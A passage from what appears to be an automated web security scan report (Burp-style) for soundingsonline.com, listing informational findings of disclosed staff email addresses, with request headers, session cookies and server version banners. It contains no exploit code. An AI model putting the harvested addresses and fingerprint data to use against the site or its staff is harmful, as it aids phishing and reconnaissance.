<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.12. http://www.soundingsonline.com/boat-shop/sea-savvy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/sea-savvy HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.13. http://www.soundingsonline.com/boat-shop/tech-talk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/tech-talk HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.14. http://www.soundingsonline.com/boat-shop/used-boat-review  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

The following email addresses were disclosed in the response:

Request

GET /boat-shop/used-boat-review HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.15. http://www.soundingsonline.com/calendar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The following email addresses were disclosed in the response:

Request

GET /calendar HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.16. http://www.soundingsonline.com/career-opportunities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The following email addresses were disclosed in the response:

Request

GET /career-opportunities HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:s.jylkka@soundingspub.com">
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.17. http://www.soundingsonline.com/columns-blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The following email addresses were disclosed in the response:

Request

GET /columns-blogs HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.18. http://www.soundingsonline.com/columns-blogs/bay-tripper  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The following email addresses were disclosed in the response:

Request

GET /columns-blogs/bay-tripper HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.19. http://www.soundingsonline.com/columns-blogs/books  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The following email addresses were disclosed in the response:

Request

GET /columns-blogs/books HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.20. http://www.soundingsonline.com/columns-blogs/new-england-fishing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The following email addresses were disclosed in the response:

Request

GET /columns-blogs/new-england-fishing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.21. http://www.soundingsonline.com/columns-blogs/under-way  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The following email addresses were disclosed in the response:

Request

GET /columns-blogs/under-way HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.22. http://www.soundingsonline.com/component/chronocontact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /component/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.23. http://www.soundingsonline.com/component/content/article/237622  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The following email addresses were disclosed in the response:

Request

GET /component/content/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.24. http://www.soundingsonline.com/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:circulation@soundingspub.com">circulation@soundingspub.com</a>
...[SNIP]...
<a href="mailto:advertising@soundingspub.com">advertising@soundingspub.com</a>
...[SNIP]...
<a href="mailto:editorial@soundingspub.com">editorial@soundingspub.com</a>
...[SNIP]...
<a href="mailto:s.vasmatics@soundingspub.com">m.grzybowski@soundingspub.com</a>
...[SNIP]...
<a href="mailto:webmaster@soundingspub.com">webmaster@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.25. http://www.soundingsonline.com/features  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The following email addresses were disclosed in the response:

Request

GET /features HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.26. http://www.soundingsonline.com/features/destinations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/destinations

Issue detail

The following email addresses were disclosed in the response:

Request

GET /features/destinations HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

7.27. http://www.soundingsonline.com/features/in-depth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The following email addresses were disclosed in the response:

Request

GET /features/in-depth HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
